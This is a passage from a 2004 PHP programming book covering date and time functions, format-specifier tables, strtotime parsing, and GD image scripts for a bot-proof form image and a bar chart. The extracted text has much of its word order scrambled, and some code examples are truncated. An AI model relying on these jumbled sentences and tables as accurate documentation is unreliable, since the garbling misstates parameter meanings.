    330 Gutmans_ch09 Page 302 Thursday, September 23, 2004 2:47 PM 302 Mainstream Extensions Chap. 9 The resolution is 1 second. If you want some more accuracy, you have two options: gettimeofday() . The microtime() function has one microtime() and annoying peculiarity: The return value is a floating-point number containing the decimal part of the timestamp and the number of seconds since the epoch, concatenated with a space. This makes it, of course, a bit hard to use for a timestamp with sub-second resolution: In putting the two parts back together, you lose some of the precision. The gettimeofday() function has a nicer interface. It returns an array with ele- ments representing the timestamp and additional microseconds. Two more elements are included in this array, but you cannot really rely on them because the underlying system functionality—at least in Linux—is not work- ing correctly: returns Array ( [sec] => 1078006910 [usec] => 339699 [minuteswest] => -60 [dsttime] => 0 ) and getdate() localtime() both return an array. The elements contain information belonging to the (optional) timestamp passed to the function. The returned arrays are not exactly the same. Table 9.5 shows what the elements in the arrays mean. Elements in Arrays Returned by localtime() and getdate() Table 9.5 localtime() Meaning Index ( Index ( getdate( ) ) Remarks ) tm_sec seconds Seconds tm_min minutes Minutes

    331 Gutmans_ch09 Page 303 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 303 Table 9.5 Elements in Arrays Returned by getdate() and localtime() ) localtime() ) Meaning Index ( ) getdate( Index ( Remarks tm_hour hours Hours mday tm_mday Day of month mon tm_mon Month For localtime: Janu- ary=0; for getdate: January=1 tm_year year Year tm_wday wday Day of week With 0 being Sun- day and 6 being Saturday tm_yday yday Day of year With 0 being Janu- ary 1st and 366 nd being December 32 tm_isdst if Day- DST in effect true Set to light Savings Time is in effect weekday Textual day of English name of the week weekday month Textual month English name of the month Timestamp Number of seconds since 01-01-1970 0 is especially interesting. It’s the only tm_isdst The localtime() element of way in PHP to see whether the server is in DST. Also, note that the month number in the return array of starts with 0, not with 1, which localtime() makes December month 11. The first parameter for both functions is a time stamp, allowing the functions to return date information based on the time you pass them, rather than just on the current time. localtime() normally returns an array with numerical indices, rather than the indices as described in the previous table. To signal the function to return an associative array, you true as the second parameter. If you want to return this associa- need to pass tive array with information about the current time, you need to pass the function as first parameter: time() . Both Two more date functions are available: gmmktime() and mktime() functions create a timestamp based on parameters passed when the function treats the gmmktime() is called. The difference between the two functions is that date/time parameters passed as a Greenwich Mean Time (GMT), while param- eters passed to mktime() are treated as local time. The order of parameters is not very user friendly, as you can see in the prototype of the following function:

    332 Gutmans_ch09 Page 304 Thursday, September 23, 2004 2:47 PM 304 Mainstream Extensions Chap. 9 timestamp mktime ( [$hour [, $minute [, $second [, $month [, $day [, ➥ $year [, $is_dst]]]]]]]) Note the particularly weird order of the parameters. All parameters are optional. If any parameter is not included, the “current” value is used, depend- is_dst ing on the current date and time. The last parameter, , controls whether the date and time parameters that are passed to the function are DST-enabled , which signals PHP to deter- -1 or not. The default value for the parameter is mine for itself whether the date falls into the range when DST is observed. Here is an example: The first three calls “make” a timestamp for January 17, in which no DST $is_dst parameter to 0 has no effect on the is observed. Therefore, setting the 1 , though, the timestamp will be one hour returned timestamp. If it’s set to mktime() earlier, as the function converts the DST time (which is always one mktime() calls, we use June 17 in hour ahead of non-DST). For the second set of parameter to now makes the which DST is observed. Setting the $is_dst 0 function convert the time from non-DST to DST and, thus, the returned time- stamp will be one hour ahead of the result of the first and third calls. The out- put is 20040217 15:16:17 20040217 15:16:17 20040217 14:16:17 20040617 15:16:17 20040617 16:16:17 20040617 15:16:17 $is_dst It’s best not to touch the parameter, because PHP usually inter- prets the date and time correctly. mktime() by , the parameters passed to gmmktime() If we replace all calls to the function are treated as GMT time, with no time zones taken into account. With mktime() , the time zone that the server has configured is taken into

    333 Gutmans_ch09 Page 305 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 305 account. For instance, if you are on Central European Time (CET), passing the same parameters as shown previously to gmmktime output times that are one function hour “later.” Because the does date take into account time zones, the generated GMT timestamp is treated as a CET time zone, resulting in times that are one hour for non-DST times and two hours for DST times (CEST is CET+1). 9.4.2 Formatting Date and Time gmmktime() and then showing it in the current time Making a GMT date with zone with the date() function doesn’t make much sense. Thus, we also have date() two functions for formatting date/time: to format a local date/time, and gmdate() to format a GMT date/time. Both functions accept exactly the same parameters. The first parameter is a format string (more about that in a bit), and the second is an optional timestamp. If the timestamp parameter is not included, the current time is used in formatting the output. date() always format the date in gmdate() and English, not in the current “locale” that is set on your system. Two functions are provided to format local time/date according to locale settings: strftime() for GMT times. Table 9.6 describes formatting gmstrftime() for local time and (gm)strftime() prefix to the string characters for both functions. Note that the . formatting string options with a % Table 9.6 Date Formatting Modifiers date / strftime / Description gmdate gmstrftime Remarks A AM/PM a%p Either am or pm for the English locale. am/pm Other locales might have their replace- ments (for example, nl_NL has an empty string here). %C Century, numeric Returns the century number 20 for 2004, and so on. two digits %% Use this to place a literal character % Character, literal % inside the formatting string. %n Character, newline Use this to place a newline character inside the formatting string. %t Character, tab Use this to place a tab character inside the formatting string. t Day count in month Number of days in the month defined by the timestamp. %e Day of month, lead- Current day in this month defined by the ing spaces timestamp. A space is prepended when the day number is less than 10. d%D Day of month, lead- Current day in this month defined by the ing zeros timestamp. A zero is prepended when the day number is less than 10. j Day of month, with- Current day in this month defined by the out leading zeros timestamp.

    334 Gutmans_ch09 Page 306 Thursday, September 23, 2004 2:47 PM 306 Mainstream Extensions Chap. 9 Table 9.6 Date Formatting Modifiers date / strftime / Description gmstrftime Remarks gmdate l %A strftime() , the day is shown accord- Day of week, full For ing to the names of the current locale. textual shows Monday mandag w%w The range is 0–6 with 0 being Sunday Day of week, and 6 being Saturday. numeric ( 0 = Sunday) %u The range is 1–7 with 1 being Monday Day of week, and 7 being Sunday. numeric ( = Monday) 1 D%a For the (gm)strftime() function, the Day of week, short name is shown according to the locale; textual for it is the normal three let- (gm)date() ter abbreviation: Sun, Sat, Wed, and so on. %j Day of year, The day number in a year, starting with numeric with lead- 001 for January 1 to 365 or 366. ing zeros z The day number in a year, starting with Day of year, for January 1 to 364 or 365. 0 numeric without leading zeros I Returns 1 if DST is active and 0 if DST is DST active not active for the given timestamp. %D . Gives the same result as using %d/%m/%y Formatted, %d/%m/%y %T . Gives the same result as using %H:%M:%S Formatted, %H:%M:%S %R The time in 24-hour notation without Formatted, seconds. in 24-hour notation %r Formatted, The time in 12-hour notation including seconds. in a.m./p.m.

    335 Gutmans_ch09 Page 307 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 307 Table 9.6 Date Formatting Modifiers date / strftime / Description gmdate gmstrftime Remarks %x Formatted, locale The date in preferred locale format. preferred date %c The date and time in preferred locale Formatted, locale preferred date and format. time %X Formatted, locale The date in preferred locale format. preferred time h%I Hour, 12-hour format, leading zeros g Hour, 12-hour format, no leading zeros H%H Hour, 24-hour format, leading zeros G Hour, 24-hour format, no leading zeros B Internet time The swatch Internet time in which a day is divided into 1,000 units: c ISO 8601 Shows the date in ISO 8601 format: 2004-03-01T00:08:37+01:00 L 1 Returns Leap year if the year represented by the timestamp is a leap year, or otherwise. 0 i%M Minutes, leading zeros

    336 Gutmans_ch09 Page 308 Thursday, September 23, 2004 2:47 PM 308 Mainstream Extensions Chap. 9 Table 9.6 Date Formatting Modifiers strftime / date / Description gmdate gmstrftime Remarks F%B the month name is (gm)strftime() , Month, For the name in the language of the current full textual locale. M%m Month, numeric with leading zeros N Month, numeric without leading zeros M %h Month, , %b short textual R Returns a RFC 2822 (mail) formatted RFC 2822 text (Mon, 1 Mar 2004 00:13:34 +0100) . U Seconds since UNIX epoch s%S Seconds, numeric with leading zeros S Suffix for day of Returns an English ordinal suffix for use with the month, English formatting option. j ordinal Z Returns the offset to GMT in seconds. Time zone, numeric (in seconds) For CET, this is ; for EST, this is 3600 , for example. –18000 O Time zone, numeric Returns a formatted offset to GMT. For formatted CET, this is ; for EST, this is , -0500 +0100 for example. T%Z Time zone, textual Returns the current time zone name: CET, EST, and so on. W%V Week number, ISO In ISO 8601, week #1 is the first week in 8601 the year having four or more days. The range is 01 to 53, and you can use this in combination with %G %g for the accom- or panying year.

    337 Gutmans_ch09 Page 309 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 309 Date Formatting Modifiers Table 9.6 date / strftime / Description gmstrftime Remarks gmdate y%y Year, numeric two digits with leading zeroes %g This number might differ from the “real Year, numeric year,” as in ISO 8601; January 1 might two digits; year still belong to week 53 of the year before. component for %W In that case, the year returned with this formatting option will be the one of the previous year, too. Y%Y Year, numeric four digits %G Year, numeric This number might differ from the “real year,” as in ISO 8601; January 1 might four digits; year still belong to week 53 of the year before. component for %W In that case, the year returned with this formatting option will be the one of the previous year, too. This example shows that the 9.4.2.1 Example 1: ISO 8601 Week Numbers ISO 8601 year format option ( %V ) might differ from the normal year format ) if a year has less than four days: %Y option (

    338 Gutmans_ch09 Page 310 Thursday, September 23, 2004 2:47 PM 310 Mainstream Extensions Chap. 9 echo gmstrftime( "%Y-%m-%d (%V %G, %A)\n", gmmktime(0, 0, 0, 1, $i, 2005) ); } ?> The script outputs 2004-12-27 (53 2004, Monday) 2004-12-28 (53 2004, Tuesday) 2004-12-29 (53 2004, Wednesday) 2004-12-30 (53 2004, Thursday) 2004-12-31 (53 2004, Friday) 2005-01-01 (53 2004, Saturday) 2005-01-02 (53 2004, Sunday) 2005-01-03 (01 2005, Monday) 2005-01-04 (01 2005, Tuesday) 2005-01-05 (01 2005, Wednesday) 2005-01-06 (01 2005, Thursday) As you can see, the ISO year is different for January 1 and 2, 2005, because the first week (Monday to Sunday) only has two days. Every year around October, at least 10–25 9.4.2.2 Example 2: DST Issues bugs are reported when a day is listed twice in somebody’s overview. Actually, the day listed twice is the date on which DST ends, as you can see in this example: When this script is run, you see the following output: 2004-10-31 (00:00:00) 2004-10-31 (23:00:00) 2004-11-01 (23:00:00) 2004-11-02 (23:00:00)

    339 Gutmans_ch09 Page 311 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 311 The 31st is listed twice because there are actually 25 hours between mid- night, October 31 and November 1, not the 24 hours that were added in our loop. You can solve the problem in one of two ways. If you pick a different time of day, such as noon, the script will always have the correct date: Its output is 2004-10-29 (12:00:00) 2004-10-30 (12:00:00) 2004-10-31 (11:00:00) 2004-11-01 (11:00:00) However, there is still a difference in the time. A better solution is to function a little: abuse the mktime() Its output is 2004-10-30 (00:00:00) CEST 2004-10-31 (00:00:00) CEST 2004-11-01 (00:00:00) CET 2004-11-02 (00:00:00) CET 2004-11-03 (00:00:00) CET 2004-11-04 (00:00:00) CET mktime() parameter that describes the day of We add the day offset to the month. mktime() then correctly wraps into the next months and years and takes care of the DST hours, as you can see in the previous output.

    340 Gutmans_ch09 Page 312 Thursday, September 23, 2004 2:47 PM 312 Mainstream Extensions Chap. 9 Some- 9.4.2.3 Example 3: Showing the Local Time in Other Time Zones times, you want to show a formatted time in the current time zone and in other time zones as well. The following script shows a full textual date repre- sentation for the U.S., Norway, the Netherlands, and Israel: Figure 9.4 shows its output. March 1 in different locales. Fig. 9.4 Note: You need to have the locales and time-zone settings installed on your system before this will work. It is a system-dependent setting and not every- thing is always available on your system. If you’re a Mac OS X user, have a look at http://www.macmax.org/locales/index_en.html to install locales.

    341 Gutmans_ch09 Page 313 Thursday, September 23, 2004 2:47 PM 9.4 Date Handling 313 9.4.3 Parsing Date Formats The opposite of formatting text is parsing a textual description of a date into a function handles a many different formats. In timestamp. The strtotime() addition to the formats listed at http://www.gnu.org/software/tar/manual/ html_chapter/tar_7.html, PHP also supports some extra ISO 8601 formats (http://www.w3.org/TR/NOTE-datetime). Table 9.7 contains a list of the most useful formats. strtotime() Table 9.7 Date/Time Formats as Understood by GMT Formatted Date Remarks Date String 1970-09-17 1970-09-16 23:00:00 ISO 8601 preferred date. 9/17/72 1972-09-16 23:00:00 Common U.S. way (d/m/yy). 24 September 1972 1972-09-23 23:00:00 Without any specified time, 0:00 is used. Because the time zone is set to 24 Sep 1972 1972-09-23 23:00:00 MET (GMT+1), the GMT formatted date is in the previous day. Sep 24, 1972 1972-09-23 23:00:00 20:02:00 2004-03-01 19:02:00 Without any date specified, the cur- rent date is used. 20:02 2004-03-01 19:02:00 8:02pm 2004-03-01 19:02:00 20:02-0500 2004-03-02 01:02:00 -0500 is the time zone (EST). 20:02 EST 2004-03-02 01:02:00 Thursday 2004-03-03 23:00:00 A day name advances to the first available day with this name. In 1 Thursday case the current day has this name, this Thursday the current day is used. 2 Thursday 19:00 2004-03-11 18:00:00 is the second Thursday from now. 2 next Thursday 7pm Next 2004-03-11 18:00:00 means the next available day after the first avail- with this name able day, and thus is the same as . 2 last Thursday 19:34 2004-02-26 18:34:00 The Thursday before the current day. If the name of the day is the same as the current day, the time- stamp of the previous day is used. 1 year 2 days ago 2003-02-27 21:25:44 The current time is used to calcu- late the relative displacement with. -1 year -2 days 2003-02-27 21:25:44 The – sign is needed before every displacement unit; if it’s not used, -1 year 2 days 2003-03-03 21:25:44 + ” is postfixed, is assumed. If “ ago 1 year -2 days 2005-02-27 21:25:44 the meaning of – and + is reversed. Other possible units are second, tomorrow 2004-03-02 21:25:44 minute, hour, week, Month, and yesterday 2004-02-29 21:25:44 fortnight (14 days). 20040301T00:00:00+1900 2004-02-29 05:00:00 Used for WDDX parsing.

    342 Gutmans_ch09 Page 314 Thursday, September 23, 2004 2:47 PM 314 Mainstream Extensions Chap. 9 Table 9.7 strtotime() Date/Time Formats as Understood by GMT Formatted Date String Date Remarks 2004W021 2004-01-04 23:00:00 Midnight of the first day of ISO week 21 in 2004. 2004122 0915 2004-12-22 08:15:00 Only numbers in the form yyyymmdd hhmm. function is easy. It accepts two parameters: the strtotime() Using the string to parse to a timestamp and an optional timestamp. If the timestamp is included, the time is converted relative to the timestamp; if it’s not included, yes- the current time is used. The relative calculations are only written with tomorrow , terday , and the 1 year 2 days (ago) format strings. strtotime() parsing is always done with the current time zone, unless a different time zone is specified in the string that is parsed: For more information on time zones, times, and calendars, see the excel- lent web site at http://www.timeanddate.com/. M GD 9.5 G WITH ANIPULATION RAPHICS Instead of describing all the GD functions that PHP supports, we discuss two common uses of the GD image library. In the first example, we use the GD libraries to build an image with a code word on it. We also add some distor- tions so that the image is machine-unreadable—the perfect protection against automatic tools that fill in forms. In the second example, we create a bar chart, including axis, labels, background, TrueType text, and alpha blending. Our examples require the bundled GD library. For UNIX OSs, you need (without path). For Windows, you --with-gd to compile PHP using the option can use the packaged . Because we make php.ini and enable it in php_gd2.dll use of some additional functions of the GD library, you need to see the infor- mation, shown in Figure 9.5, in the GD section of your output phpinfo() (except for WBMP and XPM support).

    343 Gutmans_ch09 Page 315 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 315 GD phpinfo() output. Fig. 9.5 A typical set of configuration options would be --with-gd --with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr ➥ 9.5.1 Case 1: Bot-Proof Submission Forms The following script makes it difficult for automatic tools to submit forms. The steps involved in this basic script are create a drawing space, allocate colors, fill the background, draw characters, add distortions, and output the image to the browser: line. For this to work, you need to store the code in a database and, for example, with a random key read the code back in the script generating the image, as in something like this:

    344 Gutmans_ch09 Page 316 Thursday, September 23, 2004 2:47 PM 316 Mainstream Extensions Chap. 9 mysql_connect(); $res = mysql_query('SELECT code FROM codes WHERE key='. (int) $_GET['key']); $code = mysql_result($res, 0); and embed it into the HTML page with: /* Create canvas */ $img = imagecreatetruecolor($size_x, $size_y); imagecreatetruecolor() , we create a new “canvas” to draw on with With 256 different shades of red, green, and blue available, and an alpha channel imagecreate that can be used to cre- per pixel. PHP provides another variant of ate “paletted images” with 256 colors maximum, but imagecreatetruecolor() is used more often because images produced by it usually look better. Both JPEG and PNG files support true color images, so we use this function for our PNG file. The default background is black. Because we want to change the back- ground, we need to “allocate” some colors, as follows: /* Allocate colors */ $background = imagecolorallocate($img, 255, 255, 255); $border = imagecolorallocate($img, 128, 128, 128); $colors[] = imagecolorallocate($img, 128, 64, 192); $colors[] = imagecolorallocate($img, 192, 64, 128); $colors[] = imagecolorallocate($img, 108, 192, 64); imagecolorallocate() to define five different In the previous code, we use $background colors— $border , and $colors , an array containing three colors to , $img use in rendering the text. In each function call, we pass the variable imagecreatetruecolor() function earlier (the image resource returned by the in the script), followed by three parameters specifying color values. The first specifies the amount of red in the color, the second specifies a value for the blue channel, and the third indicates the amount of green in the color. The color values can range from 0 to 255. For example, white is specified by 255, 255, 255 (the highest possible color value for all three channels) and black is specified by 0, 0, 0 (the lowest possible color value for all three channels). In $background is white and $border is defined with color values of the script, 50%, which is gray. You can add more colors if you wish. /* Fill background */ imagefilledrectangle($img, 1, 1, $size_x - 2, $size_y - 2, ➥ $background); imagerectangle($img, 0, 0, $size_x - 1, $size_y - 1, $border);

    345 Gutmans_ch09 Page 317 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 317 By using the two functions, we change the background color to white and add the gray border. Both functions accept the same parameters: the image resource, the coordinates of the top-left corner, the coordinates of the bottom- to 0, 0 size_x – 1, right corner, and the color. The coordinates range from size_y – 1 1, 1 size_x – 2, to , so we draw a filled rectangle from position size_y – 2 . We also draw a gray border around the edge of the image. /* Draw text */ for ($i = 0; $i < strlen($code); $i++) { $color = $colors[$i % count($colors)]; imagettftext( $img, 28 + rand(0, 8), -20 + rand(0, 40), ($i + 0.3) * $space_per_char, 50 + rand(0, 10), $color, 'arial.ttf', $code{$i} ); } In this code, we loop through all the characters in our code string. First, % ) operator to we pick the next element in the colors array. We use the modulo ( be sure we have an element with this key in the array. Next, we use the imagettftext() function to draw the letter. We pass the parameters shown in . imagettftext() Table 9.8 to Table 9.8 Parameters to imagettftext() Remarks Parameter Content $img img The image resource on which to draw. fontsize 28 + rand(0, 8) The size in points (not pixels) of the characters to be drawn. For randomness, we select a size between 28 and 36 points. angle -20 + rand(0, The angle in which the character is drawn in degrees 40) (the range is 0–360). We use it here to “twist” the char- acters a bit, which makes it harder for an automatic tool to read it. x ($i + 0.3) * The x location where the character is drawn (also $space_per_char some additional randomness here). 50 + rand(0, 10) y y The location for the character. This is not the upper limit, but the place where the baseline of the charac- ter is drawn. The baseline is usually the location of the lower boundary of characters without any tails, such as s (and not p ). colour $color The color to use for drawing the text. font 'arial.ttf' The name of the font file to use. text $code$i) The character from the code that we draw.

    346 Gutmans_ch09 Page 318 Thursday, September 23, 2004 2:47 PM 318 Mainstream Extensions Chap. 9 /* Adding some random distortions */ imageantialias($img, true); is a technique to create This line turns on anti-aliasing. Anti-aliasing smoother lines. Because it is much better explained with an image, see the effect in Figure 9.6. Not anti-aliased Anti-aliased Fig. 9.6 Anti-aliasing. Text drawn with the function is always anti-aliased. If Tip: imagettftext() -$color ) in you do not want this, you need to use a negative color number (like the previous example. This trick does not work for totally black colors because 0 is the 0 the handle returned for black in a true color image is just . Because same as -0 for PHP, the anti-aliasing is not turned off. You can easily work around this by allocating black with $black = imagecolorallocate($img, 0, 0, 1) (changing one of the components from 0 to 1). for ($i = 0; $i < 1000; $i++) { $x1 = rand(5, $size_x - 5); $y1 = rand(5, $size_y - 5); $x2 = $x1 - 4 + rand(0, 8); $y2 = $y1 - 4 + rand(0, 8); imageline($img, $x1, $y1, $x2, $y2, $colors[rand(0, count($colors) - 1)] ); } We draw 1,000 small lines with randomized coordinates for both the imageline() start and end. The function has the following parameters: image resource, starting x and y coordinates, ending x and y coordinates, and the color with which to draw the line. /* Output to browser */ header('Content-type: image/png'); imagepng($img); ?>

    347 Gutmans_ch09 Page 319 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 319 header() function to tell the browser At the end of our script, we use the . This image/png mime-type to expect data representing is associated with a PNG image by the browser, so that it knows how to handle the data properly. Differ- image/ ent data types have different mime types. For images, you can specify gif image/jpeg (for JPEG images), application/octet-stream (for GIF images), (for binary data), and other mime types. With the Content-type HTTP header, header() we tell the browser what to expect. This function can only be used if no content is output before the header statement. That means no whitespace, header statement, no HTML tags, nothing at all. If output is sent before the you receive a warning like the following: Warning: Cannot modify header information - headers already sent by ➥ (output started at /dat/docs/book/gd/no-bot.php:2) in /dat/docs/ book/gd/no-bot.php on line 53 ➥ Finally, we call the imagepng() function, which accepts the image resource as its first parameter. It accepts a second optional parameter: a file name where the image will be stored. If the second parameter is not included, the function “echoes” all image data to the browser. Figure 9.7 shows the image output by the preceding script. Output of the anti-bot script. Fig. 9.7 Each image type has a specific output function. Two functions are , for WBMP images (some wireless format), and imagejpeg() , for imagewbmp() $img and $filename JPEG images. In addition to the two parameters , the JPEG output function accepts a third parameter that is the compression quality of the JPEG image. The default value is 75. A value of 100 gives the best quality image, but even with this value, you might still encounter little distortions in the image. For a better quality image, use a PNG image. If you want to change the default quality setting but don’t want to save the image to a file, you need imagejpeg() to an empty string, as in to set the second parameter of imagejpeg($img, '', 95); It’s best to use JPEG images with a quality greater than 85 for photos and PNG images, because that setting gives a better result for line-based images, such as charts. You can see the difference clearly in Figure 9.8, which is a closeup of the bar chart image we will create in the second example.

    348 Gutmans_ch09 Page 320 Thursday, September 23, 2004 2:47 PM 320 Mainstream Extensions Chap. 9 Comparing 75 percent quality JPEG and PNG. Fig. 9.8 and the right one with The left image is created with imagejpg($img) . You can see clearly that the JPEG image is not really sharp. imagepng($img) JPEG images have the advantage in size. They are usually much smaller then PNG images. In this specific example, the full JPEG image is 44KB and the PNG image is 293KB. 9.5.2 Case 2: Bar Chart Figure 9.8 already gave you a peek at the chart we will make. Some keywords include background, transparent bars, and TrueType text positioning. 5300, 2000 => 5700, 2001 => 6400, 2002 => 6700, 2003 => 6600, 2004 => 7100 ); $max_value = 8000; $units = 500; $values The array defines our data set from which we will draw the bars on our chart. Normally, you would not hardcode those values into your script. Rather, the values would come from another source such as a database. The $max_value variable defines the maximum value in the chart and is used for the automatic scaling of the values. The $units variable defines the distance between vertical lines of the grid.

    349 Gutmans_ch09 Page 321 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 321 $img = imagecreatetruecolor($size_x, $size_y); imageantialias($img, true); imagealphablending($img, true); As before, we create a true-color image and turn on anti-aliasing. The call imagealphablending() is is not always needed because the setting to true is a technique to “blend” new Alpha blending default for true-color images. pixels being drawn onto an image by using its alpha channel. We need to use the function here because we want our bars on the chart to be transparent (letting us see the background through the image). Transparency is a color imagecolorallocatealpha() property for PHP, defined in the fifth parameter to used later in the script. $bg_image = '../images/chart-bg.png'; $bg = imagecreatefrompng($bg_image); $sizes = getimagesize($bg_image); The previous section of the script loads the background image with imagecreate- imagecreatefrompng() . Similar functions for reading JPEG files ( fromjpg() ) and GIF files ( ) are available. getimagesize() is imagecreatefromgif() a function that returns an array containing the width and height of an image, along with additional information. The width and height are the first two ele- width='640' ments in the array. The third element is a text string, height='480' , that you can embed into HTML where needed. The fourth ele- ment is the type of image. PHP can determine the size of about 18 different file types, including PNG, JPEG, GIF, SWF (Flash files), TIFF, BMP, and PSD image_type_to_mime_type() function, you can transform (Photoshop). With the or application/x- the type in the array to a valid mime type like image/png shockwave-flash . imagecopyresampled( $img, $bg, 0, 0, 0, 0, $size_x, $size_y, $sizes[0], $sizes[1] ); We copy the PNG we read from file onto the destination image—our chart. The function requires 10 parameters. The first two are the handle of the destination image and the handle of the loaded PNG image, followed by four sets of coordinates: the top-left coordinates for the destination image, the top- left coordinates of the source image, the bottom-right coordinates for the desti- nation image, and the bottom-right coordinates of the source image. You can copy a part of the source image onto the destination image by using the appro- imagecopyresized() also priate coordinates of the source image. The function copies images and is faster, but the result is not as good because the algorithm is less capable.

    350 Gutmans_ch09 Page 322 Thursday, September 23, 2004 2:47 PM 322 Mainstream Extensions Chap. 9 /* Chart area */ $background = imagecolorallocatealpha($img, 127, 127, 192, 32); imagefilledrectangle( $img, 20, 20, $size_x - 20, $size_y – 80, $background ); imagefilledrectangle( $img, 20, $size_y - 60, $size_x - 20, $size_y – 20, $background ); We draw the two bluish areas on the background image: one for the chart and one for the title. Because we want the areas to be transparent, we create a color with an alpha value of 32. The alpha value must lie between 0 and 127, where zero means a fully opaque color and 127 means fully transparent. /* Values */ $barcolor = imagecolorallocatealpha($img, 0, 0, 128, 80); $spacing = ($size_x - 140) / count($values); $start_x = 120; foreach ($values as $key => $value) { $x1 = $start_x + 0.2 * $spacing; $x2 = $start_x + 0.8 * $spacing; $y1 = $size_y - 120; $y2 = $y1 - (($value / $max_value) * ($size_y - 160)); imagefilledrectangle($img, $x1, $y1, $x2, $y2, $barcolor); $start_x += $spacing; } $values array created at the begin- We draw the bars (as defined in the ning of the script) with the imagefilledrectangle() . We calculate the spacing between the bars by dividing the width available for the bars (image width minus the outside margins, which total 140-120 on the left and 20 on the right) by the number of values in our array. The loop increments the $start_x component by the correct amount and the bar is drawn from 20 percent to 80 percent of its available horizontal space. Vertically, we take into account the maximum drawable value and adjust the size accordingly. /* Grid */ $black = imagecolorallocate($img, 0, 0, 0); $grey = imagecolorallocate($img, 128, 128, 192); for ($i = $units; $i <= $max_value; $i += $units) { $x1 = 110;

    351 Gutmans_ch09 Page 323 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 323 $y1 = $size_y - 120 - (($i / $max_value) * ($size_y - ➥ 160)); $x2 = $size_x - 20; $y2 = $y1; imageline( $img, $x1, $y1, $x2, $y2, ($i % (2 * $units)) == 0 ? $black : $grey ); } /* Axis */ imageline($img, 120, $size_y - 120, 120, 40, $black); imageline( $img, 120, $size_y - 120, $size_x - 20, $size_y – 120, $black ); The grid and axis are drawn in a similar way. The only thing worth men- tioning is that we color every second horizontal line black and the others gray. /* Title */ $c_x = $size_x / 2; $c_y = $size_y - 40; $box = imagettfbbox(20, 0, 'arial.ttf', $title); $sx = $box[4] - $box[0]; $sy = $box[5] + $box[1]; imagettftext( $img, 20, 0, $c_x - $sx / 2, $c_y - ($sy / 2), $black, 'arial.ttf', $title ); We want to draw the title in the exact middle of our bottom blue bar. Therefore, we need to calculate the exact space (bounding box) required for our imagettfbbox() to do this. The parameters passed are the fontsize , text. We use , angle , and the text . These parameters need to be the same as the fontfile text we are drawing later. The function returns an array with eight elements, grouped by two, to provide the coordinates of the four corners of the bounding box. The groups stand for the lower-left corner, the lower-right corner, the upper-right corner and the upper-left corner. In Figure 9.9, you can see the bounding box drawn around the text “Imågêß?”.

    352 Gutmans_ch09 Page 324 Thursday, September 23, 2004 2:47 PM 324 Mainstream Extensions Chap. 9 Different measurements for TrueType. Fig. 9.9 and (y) axis drawn in Figure 9.9 are the 0-lines to The baseline (x) which the bounding box coordinates are related. As you can see, the left side is not exactly zero. In addition, the bottom of the normal letters is on the base- line, with the “tails” below the baseline. To calculate the width of the text to be drawn, we subtract Element 0 (lower-left x) from Element 4 (upper-right x); to Element 1 (lower-left y) to Element 5 (upper-right calculate the height, we add y). The resulting sizes can then be used to center the text on the image. Calcu- lating sizes with the bounding box only works reliably for angles of 0, 90, 180, and 270. The GD library does not calculate the bounding boxes totally cor- rectly, but this problem does not account for the angles mentioned. $c_x = 50; $c_y = ($size_y - 60) / 2; $box = imagettfbbox(14, 90, 'arial.ttf', $title2); $sx = $box[4] - $box[0]; $sy = $box[5] + $box[1]; imagettftext( $img, 14, 90, $c_x - ($sx / 2), $c_y - ($sy / 2), $black, 'arial.ttf', $title2 ); We do the same for the title for the Y axis, except that we use an angle of 90. The rest of the code remains the same. /* Labels */ $c_y = $size_y - 100; $start_x = 120; foreach ($values as $label => $dummy) { $box = imagettfbbox(12, 0, 'arial.ttf', $label); $sx = $box[4] - $box[0]; $sy = $box[5] + $box[1]; $c_x = $start_x + (0.5 * $spacing); imagettftext( $img, 12, 0,

    353 Gutmans_ch09 Page 325 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 325 $c_x - ($sx / 2), $c_y - ($sy / 2), $black, 'arial.ttf', $label ); $start_x += $spacing; } $r_x = 100; for ($i = 0; $i <= $max_value; $i += ($units * 2)) { $c_y = $size_y - 120 - (($i / $max_value) * ($size_y - ➥ 160)); $box = imagettfbbox(12, 0, 'arial.ttf', $i / 100); $sx = $box[4] - $box[0]; $sy = $box[5] + $box[1]; imagettftext( $img, 12, 0, $r_x - $sx, $c_y - ($sy / 2), $black, 'arial.ttf', $i / 100 ); } In the previous code, we draw the different labels. The ones for the X axis are not interesting, but for the Y axis, we try to align the text on the right mar- gin by not dividing the width of the text to be drawn by 2. /* Output to browser */ header('Content-type: image/png'); imagepng($img); ?> With those final lines, we output the bar chart to the browser. The result can be seen in Figure 9.10.

    354 Gutmans_ch09 Page 326 Thursday, September 23, 2004 2:47 PM 326 Mainstream Extensions Chap. 9 The result of the bar chart script. Fig. 9.10 9.5.3 Exif Exif is not totally related to handling image content. is a method, nor- Exif mally used by digital cameras, of storing metadata (such as time, focal length, and exposure time) inside a digital image. It’s a nice feature provided by PHP for learning more about how a photo was taken. To read Exif tags from images, --enable-exif configure option, which does not require compile PHP with the php_exif.dll any external library. (On Windows, you need to enable the in php.ini. phpinfo() should be similar to Figure 9.11. ) The section in Exif output. Fig. 9.11 phpinfo() Exif data from an image and display In the following example, we read the aperture, shutter speed, focal length, and owner name. Tip: For information in addition to the information stored in an image with Exif , see http://exif.org/specifications.html.

    355 Gutmans_ch09 Page 327 Thursday, September 23, 2004 2:47 PM 9.5 Graphics Manipulation with GD 327 Not all cameras set all headers, so you have to test whether a header Note: exists!

